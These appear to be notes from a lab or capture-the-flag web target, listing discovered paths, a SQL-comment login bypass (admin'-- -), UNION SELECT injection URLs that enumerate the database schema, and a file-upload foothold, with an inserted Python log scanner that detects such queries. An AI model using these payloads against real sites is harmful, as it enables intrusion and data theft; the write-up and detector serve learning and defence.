http

[00:17:57] 301 -  316B  - /admin  ->  http://192.168.74.111/admin/
[00:17:57] 200 -    3KB - /admin/?/login
[00:17:57] 200 -    3KB - /admin/
[00:17:57] 200 -    3KB - /admin/index.php
[00:17:57] 302 -   24KB - /admin/home.php  ->  http://192.168.74.111/admin/index.php
[00:18:02] 200 -    0B  - /checklogin.php
[00:18:03] 302 -   10KB - /dashboard.php  ->  http://192.168.74.111/index.php
[00:18:07] 200 -    2KB - /header.php
[00:18:07] 200 -    3KB - /index.php
[00:18:08] 200 -   11KB - /index.html
[00:18:08] 200 -    3KB - /index.php/login/
[00:18:10] 200 -   75B  - /logout.php
[00:18:14] 302 -    7KB - /profile.php  ->  http://192.168.74.111/index.php
[00:18:15] 200 -   14B  - /robots.txt
[00:18:16] 301 -  317B  - /secret  ->  http://192.168.74.111/secret/
[00:18:16] 200 -  108B  - /secret/
[00:18:18] 301 -  316B  - /store  ->  http://192.168.74.111/store/

CRM

got in using admin'-- -

SQL injection vuln found

returns the correct page.

which means we can extract data from here.

played around and found a position I could get data from.

http://192.168.74.111/store/book.php?bookisbn=%27UNION%20SELECT%20NULL,%20NULL,%20table_name,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20information_schema.tables%20--%20-

ADMINISTRABLE_ROLE_AUTHORIZATIONS table found

http://192.168.74.111/store/book.php?bookisbn=%27UNION+SELECT+NULL%2C+NULL%2C+column_name%2C+NULL%2CNULL%2C+NULL%2C+NULL+FROM+information_schema.columns+WHERE+table_name+%3D+%22ADMINISTRABLE_ROLE_AUTHORIZATIONS%22--+-

GRANTEE

http://192.168.74.111/store/book.php?bookisbn='UNION SELECT NULL, NULL, GRANTEE, NULL, NULL, NULL, NULL FROM "ADMINISTRABLE_ROLE_AUTHORIZATIONS"-- -

so this was a rabbit hole...
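
A defender-side view of the `bookisbn` requests above, as an added example that is not part of the original notes: a small Python scan over web access-log lines that decodes both the `%20` and `+` encodings used above and flags UNION-based probing. The log format, client IP, timestamps, `search.php` line and rule names are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (IP, timestamps, sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:20:01 +0000] '
    '"GET /store/book.php?bookisbn=978-1-49192-706-9 HTTP/1.1" 200 3120',
    '192.0.2.10 - - [01/Jan/2024:00:21:10 +0000] '
    '"GET /store/book.php?bookisbn=%27UNION%20SELECT%20NULL,%20NULL,%20table_name,'
    '%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20information_schema.tables%20--%20- '
    'HTTP/1.1" 200 9050',
    '192.0.2.10 - - [01/Jan/2024:00:22:30 +0000] '
    '"GET /store/book.php?bookisbn=%27UNION+SELECT+NULL%2C+NULL%2C+column_name%2C'
    '+NULL%2CNULL%2C+NULL%2C+NULL+FROM+information_schema.columns+WHERE+table_name'
    '+%3D+%22ADMINISTRABLE_ROLE_AUTHORIZATIONS%22--+- HTTP/1.1" 200 4410',
    # Benign control (hypothetical endpoint): the word "union" alone must not fire.
    '192.0.2.11 - - [01/Jan/2024:00:23:00 +0000] '
    '"GET /store/search.php?q=student+union HTTP/1.1" 200 800',
]

REQ = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Rules run on the *decoded* parameter value, so %20 and + look the same.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "quote_comment": re.compile(r"'.*--(\s|$)"),  # quote, then SQL comment
}

def scan_line(line):
    """Return [(param, rule), ...] for one access-log line."""
    m = REQ.search(line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # parse_qsl percent-decodes and turns '+' into a space.
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits += [(name, rule) for rule, rx in RULES.items() if rx.search(value)]
    return hits

def scan(lines):
    """Map line index -> hits, only for lines that matched a rule."""
    return {i: h for i, line in enumerate(lines) if (h := scan_line(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

The login bypass noted earlier would normally travel in a POST body, which a default access log does not record, so this scan only covers query-string parameters.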

There was an uploadable place in store --> uploaded malicious stuff there and accessed it through img/
